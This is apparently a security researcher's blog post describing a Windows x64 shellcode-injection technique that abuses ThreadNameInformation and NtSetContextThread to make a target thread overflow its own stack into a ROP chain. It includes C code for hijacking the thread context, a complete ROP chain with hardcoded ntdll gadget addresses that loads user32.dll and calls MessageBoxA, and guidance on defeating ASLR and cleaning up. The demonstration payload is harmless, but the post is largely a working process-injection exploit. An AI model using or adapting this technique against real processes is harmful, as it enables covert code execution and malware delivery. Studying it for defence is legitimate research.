Shellcode injection using ThreadNameInformation

I've recently been looking into NtSetContextThread as an exploit vector, and at different ways of setting up state so we can load some code into a target thread and then execute it. The idea of ghost writing is pretty fun, but I wanted a way to do this in a single shot, instead of having to loop over it while the thread otherwise sits in a waiting pattern (we can't do anything useful while the thread is in a syscall).

Enter NtSetInformationThread(ThreadNameInformation). Blah Cats wrote a piece on using this to allocate kernel pages and get a peek into where a thread's KTHREAD is stored, but we can also use it as an easy way to get data into a target thread. The name is stored as a UNICODE_STRING, which means we don't need to care about null-termination: we just provide a length, and the whole chunk is copied with a memmove() both when setting it and when retrieving it. We can then use NtSetContextThread() to make the target jump to a call to NtQueryInformationThread(ThreadNameInformation), and if we set up the stack right, the thread effectively overflows its own stack and returns directly into the start of our ROP chain.

As usual, if you're following along at home you'll want a Windows 10 x64 kernel 20H2. Full PoC at https://github.com/samrussell/doublebarrell

Retrieving the ROP chain

The call to NtQueryInformationThread looks like this:

__kernel_entry NTSTATUS NtQueryInformationThread(
  [in]            HANDLE          ThreadHandle,
  [in]            THREADINFOCLASS ThreadInformationClass,
  [in, out]       PVOID           ThreadInformation,
  [in]            ULONG           ThreadInformationLength,
  [out, optional] PULONG          ReturnLength
);

We can set the first 4 parameters through registers with NtSetContextThread(), but the 5th one is a challenge. It's passed on the stack: if it's NULL it's ignored, but if it's non-null the call will dereference it to store the number of bytes copied. We aren't reading or writing the target's memory directly, so we have no guarantees about the state of the stack and have to find a way to set this ourselves.

Luckily for us, ntdll calls this in a bunch of different places. In nearly all of them it sets up the stack parameter first and then nukes all the volatile registers (bad), but there is one spot in DbgUiConvertStateChangeStructureWorker() where it sets up the volatile registers first and only then stores the stack parameter.

So we can put the 5 parameters in RCX, RDX, R8, R9 and RDI and set RIP to 1800CC777 (relocated). The code there stores RDI at [RSP+0x20], which is where the 5th parameter lives, and then calls NtQueryInformationThread.

One last thing is to carefully choose the ThreadInformation parameter so that the write overwrites our return address on the stack. NtQueryInformationThread() writes a UNICODE_STRING structure (2 WORDs with length and maximum length, then an aligned pointer to the buffer, 0x10 bytes in total on x64), followed by the buffer itself. The call pushes a return address onto the stack, so the structure needs to start at current RSP - 3x sizeof(void*): that puts the first QWORD of the buffer exactly on the pushed return address.

context.ContextFlags = CONTEXT_FULL;
GetThreadContext(hThread, &context);
context.ContextFlags |= 0x03;

context.Rsp = context.Rsp - 0x200 - sizeof(threadName); // make space on the stack
context.Rcx = 0xFFFFFFFFFFFFFFFE; // -2 = current thread
context.Rdx = 0x26; // ThreadNameInformation
context.R8 = context.Rsp - 0x18; // overflow ourselves
context.R9 = (threadInformation[0] & 0xFFFF) + 0x10; // length
context.Rdi = 0; // NULL, don't update us
context.Rip = 0x7FFEE4F5C777; // relocated pointer
SetThreadContext(hThread, &context);
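To make the 0x18 and the +0x10 less magic, here's a small portable sketch of the arithmetic. UnicodeString64 is my own stand-in for the x64 layout of UNICODE_STRING (the real type comes from the Windows headers), and query_destination() / query_length() are hypothetical helper names, not something from the PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in for the x64 UNICODE_STRING layout (illustrative only). */
typedef struct {
    uint16_t Length;        /* bytes used by the string */
    uint16_t MaximumLength; /* bytes available in the buffer */
    uint32_t Padding;       /* implicit alignment padding, made explicit here */
    uint64_t Buffer;        /* 8-byte pointer to the characters */
} UnicodeString64;

static_assert(sizeof(UnicodeString64) == 0x10, "header is 16 bytes on x64");
static_assert(offsetof(UnicodeString64, Buffer) == 8, "pointer is 8-byte aligned");

/* Value for R8: the header must end right where the call pushes its
   return address, so the first QWORD of the name lands on that slot. */
uint64_t query_destination(uint64_t rsp_before_call) {
    uint64_t return_slot = rsp_before_call - sizeof(uint64_t); /* call pushes 8 bytes */
    return return_slot - sizeof(UnicodeString64);              /* header sits just below */
}

/* Value for R9: the header plus the bytes of the name itself. */
uint32_t query_length(uint16_t name_bytes) {
    return (uint32_t)sizeof(UnicodeString64) + name_bytes;
}
```

With RSP = 0x1000 this gives a destination of 0xFE8, i.e. RSP - 0x18, which matches the value loaded into R8 above.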

So we set this up, and our target thread goes straight into our ROP chain and will do what we like! Now for the proof of concept.

Shellcode courtesy of ntdll

At this point we search for gadgets that will let us pull the PEB out via GS:30 (the TEB pointer, with the PEB pointer at offset 0x60 inside it), plus a bunch of other arithmetic to locate LoadLibrary and GetProcAddress. This gives us a big ugly ROP chain and requires a lot of gadgets to make it work. With ntdll we get a head start with RtlGetCurrentPeb(), but we still need a bunch of gadgets that do stuff to RAX and return, as well as ways to store our data in non-volatile registers for later. I had a browse with ROPgadget and wasn't happy with what I found, but then I realized that ntdll is actually all we need and we don't need any arithmetic at all.

LoadLibrary -> LdrLoadDll

If we pull open kernelbase.dll we find that all roads lead to LoadLibraryExW() which then calls LdrLoadDll() in ntdll. According to ntinternals.net, we can call it as follows:

LdrLoadDll(
    0, // optional
    0, // optional
    &filename, // UNICODE_STRING
    &baseAddress // void* that receives the module address
)

The awesome thing with this is that baseAddress gets stored to a pointer of our choosing, so we can just point it further down our ROP chain and it'll automatically get loaded into a register later on. Easy.

GetProcAddress -> LdrGetProcedureAddressForCaller()

That's right, GetProcAddress() is also backed by a function in ntdll. The LdrGetProcedureAddressForCaller() function takes 6 params but there's another function that wraps it called LdrGetProcedureAddress() that only takes 4:

LdrGetProcedureAddress(
    baseAddress, // address we got from LdrLoadDll(), passed by value
    &procName, // a STRING with the name of the function we want
    0, // ordinal, given we're tailoring this to a specific build we can use this if we like
    &procAddress // void* that receives the function address
)
As with LdrLoadDll(), the last parameter is a pointer to where the function address will be stored, so this can point right back into our ROP chain too. All we need now is a couple of gadgets and we'll be sorted.

LdrpHandleInvalidUserCallTarget: the mother of all gadgets

All of this is static - we know our pointers, we know our arguments, and the two functions we call write their results right into our ROP chain. All we need now is a way to populate our volatile registers for parameters 1-4. Enter my favorite function in ntdll: LdrpHandleInvalidUserCallTarget(). I don't know what this does, and I don't really care, but what I do care about is that it pops all of the registers we care about off the stack before returning.

So whenever we want to call a function we just need to set up the stack like this:

address of LdrpHandleInvalidUserCallTarget gadget
param 2 (RDX)
param 1 (RCX)
param 3 (R8)
param 4 (R9)
null (R10)
null (R11)
function we want to call
address of return gadget
4x QWORD of shadow space

I've also kept my data inline with my calls and just step over it when I'm done with it, and this gadget lets us dump up to 7 QWORDs at a time from the stack.
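If you'd rather not count slots by hand, the layout above is easy to wrap in a helper. This is only a sketch: emit_call() is a hypothetical function of mine (the PoC just assigns the array entries directly), and the slot order is taken from the list above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: writes one call frame into chain[] starting at
   index i and returns the index of the first shadow-space slot. */
size_t emit_call(uint64_t *chain, size_t i,
                 uint64_t populate_gadget, uint64_t function,
                 uint64_t p1, uint64_t p2, uint64_t p3, uint64_t p4,
                 uint64_t return_gadget) {
    assert(chain != NULL);
    chain[i++] = populate_gadget; /* entry of the register-populating gadget */
    chain[i++] = p2;              /* RDX */
    chain[i++] = p1;              /* RCX */
    chain[i++] = p3;              /* R8  */
    chain[i++] = p4;              /* R9  */
    chain[i++] = 0;               /* R10 */
    chain[i++] = 0;               /* R11 */
    chain[i++] = function;        /* the gadget's ret lands here */
    chain[i++] = return_gadget;   /* where the called function returns to */
    return i;                     /* caller leaves 4 QWORDs free from here */
}
```

The caller skips 4 slots after the returned index before writing anything else, since the called function is free to scribble over them.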

Putting it all together

Here's the full ROP chain I use to inject a MessageBox call:

    // set up shellcode

    threadName[0] = 0x7FFEE4F1C550; // populate registers
    threadName[1] = 0; // RDX: optional
    threadName[2] = 0; // RCX: optional
    threadName[3] = context.R8 + 0x80; // R8: &UNICODE_STRING("user32.dll")
    threadName[4] = context.R8 + 0xB8; // R9: &baseAddress
    threadName[5] = 0; // R10
    threadName[6] = 0; // R11
    threadName[7] = 0x7FFEE4EA6A10; // LdrLoadDll
    threadName[8] = 0x7FFEE4F1C553; // pop 4 registers
    // shadow space break
    threadName[13] = 0x7FFEE4F1C551; // pop 5 registers
    threadName[14] = 0x0000000000160014; // UNICODE_STRING("user32.dll")
    threadName[15] = context.R8 + 0x90;
    threadName[16] = 0x0072006500730075; // "user"
    threadName[17] = 0x0064002E00320033; // "32.d"
    threadName[18] = 0x00000000006C006C; // "ll"
    threadName[19] = 0x7FFEE4F1C550; // populate registers
    threadName[20] = context.R8 + 0x120; // RDX: &STRING("MessageBoxA")
    threadName[21] = 0; // RCX: baseAddress, written here by LdrLoadDll
    threadName[22] = 0; // R8: ordinal
    threadName[23] = context.R8 + 0x178; // R9: &procAddress
    threadName[24] = 0; // R10
    threadName[25] = 0; // R11
    threadName[26] = 0x7FFEE4F11AD0; // LdrGetProcedureAddress
    threadName[27] = 0x7FFEE4F1C551; // pop 5 registers (shadow space + 1xQWORD for alignment)
    // shadow space break
    threadName[33] = 0x7FFEE4F1C553; // pop 4 registers
    threadName[34] = 0x00000000000C000B; // STRING("MessageBoxA")
    threadName[35] = context.R8 + 0x130;
    threadName[36] = 0x426567617373654D; // "MessageB"
    threadName[37] = 0x000000000041786F; // "oxA"
    threadName[38] = 0x7FFEE4F1C550; // populate registers
    threadName[39] = context.R8 + 0x188; // RDX: &message
    threadName[40] = 0; // RCX: hWnd
    threadName[41] = context.R8 + 0x190; // R8: &caption
    threadName[42] = 0; // R9: uType
    threadName[43] = 0; // R10
    threadName[44] = 0; // R11
    threadName[45] = 0; // MessageBoxA, written here by LdrGetProcedureAddress
    threadName[46] = 0x7FFEE4E9DD1B; // infinite loop gadget (0xEB 0xFE) for debugging
    threadName[47] = 0x00313144454E5750; // message: "PWNED11"
    threadName[48] = 0x00747577206C6F6C; // caption: "lol wut"

All done!
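The string constants and the context.R8 offsets in that chain can be derived rather than typed in by hand. Here's a portable sketch; slot_address(), pack_string() and string_header() are hypothetical helpers of mine, and the only assumption is the one from earlier, that threadName[0] sits 0x10 bytes after the address in R8. Packing the 16-bit string in the chain decodes to "user32.dll", which is where MessageBoxA lives.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Address of threadName[index], given that the 16-byte UNICODE_STRING
   header written by the query sits at r8 and the name follows it. */
uint64_t slot_address(uint64_t r8, size_t index) {
    return r8 + 0x10 + 8 * (uint64_t)index;
}

/* Packs an ASCII string into little-endian QWORDs using char_size bytes
   per character (1 for STRING, 2 for UNICODE_STRING).
   Returns the number of QWORDs the string occupies. */
size_t pack_string(const char *s, size_t char_size, uint64_t *out, size_t out_len) {
    assert(char_size == 1 || char_size == 2);
    size_t byte = 0;
    for (size_t k = 0; k < out_len; k++) out[k] = 0;
    for (; *s; s++, byte += char_size) {
        assert(byte / 8 < out_len);
        out[byte / 8] |= (uint64_t)(unsigned char)*s << (8 * (byte % 8));
    }
    return (byte + 7) / 8;
}

/* First QWORD of a STRING or UNICODE_STRING: Length in the low word,
   MaximumLength in the next one, padding above that. */
uint64_t string_header(uint16_t length, uint16_t maximum_length) {
    return (uint64_t)length | ((uint64_t)maximum_length << 16);
}
```

For example, slot_address(r8, 14) is r8 + 0x80, the pointer stored in threadName[3], and slot_address(r8, 45) is r8 + 0x178, the slot that receives the MessageBoxA address.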

A note on alignment

MessageBoxA() is one of those annoying functions that backs up the XMM registers and just assumes the stack is 16-byte aligned. I've skipped over the details on this but you'll need to keep this in mind whenever you're building ROP chains that operate on anything that needs to be 16-byte aligned.
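As a rough guide, the x64 calling convention has the stack 16-byte aligned just before a call, so on entry to a function (return address at [RSP]) RSP should end in 8. In a ROP chain the ret that enters the function has already popped the function's own slot, so RSP at entry is the address of the slot after it. A small sketch to check a slot before committing to it, with entry_rsp_ok() and call_slot_ok() being hypothetical names of mine:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* True if a function entered with this RSP sees the alignment the x64
   calling convention promises: RSP + 8 is a multiple of 16. */
bool entry_rsp_ok(uint64_t rsp_at_entry) {
    return (rsp_at_entry & 0xF) == 8;
}

/* chain_base is the address of slot 0 of the chain; function_index is
   the slot holding the function pointer. RSP at entry is the address
   of the next slot, which holds the return gadget. */
bool call_slot_ok(uint64_t chain_base, size_t function_index) {
    assert((chain_base & 7) == 0); /* slots are QWORDs */
    return entry_rsp_ok(chain_base + 8 * ((uint64_t)function_index + 1));
}
```

If the check fails, padding the previous step with one extra popped QWORD shifts the function's slot by 8 bytes and flips the result.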

Next steps

I've been testing this on easy mode: a binary that spins in an infinite loop (so it doesn't end up in a syscall when we call NtSetContextThread()) and doesn't appear to have ASLR enabled. We also jump out to an infinite loop gadget at the end to avoid cleanup.

Identifying and returning from a syscall

There are a few ways to figure out whether the thread is in a syscall: RCX and R10 have some good clues, RAX will be set to a low value corresponding to the syscall number, and RIP should be quite high. We actually want to catch the thread in a syscall though, as this gives us a bunch of clues for where to offset our gadgets from. As mentioned in NINA, we can always set RIP to an infinite loop split instruction and jump out there (ntdll has tons to choose from); once we're there we can do a second call to kick off our injection. You'll want to store RAX after relocating to the infinite loop, as you'll need to put it back when cleaning up (the RAX you picked up in the syscall is there before the syscall itself returns).

Handling ASLR

The advantage of getting the thread context while it's in a syscall is that we know which syscall was made (RAX) and the return address (RIP), which means we know exactly which function in ntdll was hit. We can then look up its RVA, subtract it from RIP to get the base of ntdll, and use that to adjust the addresses for our gadgets and function calls.
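The rebasing itself is just a subtraction and an addition. Here's a minimal sketch with hypothetical helper names; it assumes the static addresses come from a disassembler that loaded ntdll at a preferred base of 0x180000000, which is what the 1800CC777 address earlier suggests.

```c
#include <assert.h>
#include <stdint.h>

/* Recover the module base from a runtime address and its known RVA. */
uint64_t module_base(uint64_t runtime_address, uint64_t rva) {
    assert(runtime_address >= rva);
    return runtime_address - rva;
}

/* Rebase an address taken from a disassembler that used preferred_base
   onto the base the module actually has in the target process. */
uint64_t rebase(uint64_t static_address, uint64_t preferred_base, uint64_t actual_base) {
    assert(static_address >= preferred_base);
    return actual_base + (static_address - preferred_base);
}
```

Plugging in the numbers from this post, rebase(0x1800CC777, 0x180000000, 0x7FFEE4E90000) gives 0x7FFEE4F5C777, the RIP value used in the context setup.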

Cleaning up

Unless your target thread has been naughty and stored data below RSP, all you need to do is fix up RSP, RAX and RIP. Everything else that we clobbered also gets clobbered in a syscall, so we don't care. We've left all our strings and gadget addresses in stack memory, so you're welcome to zero it out if you care, but that's an exercise for the reader.

Sauce

PoC at https://github.com/samrussell/doublebarrell

Happy hacking!
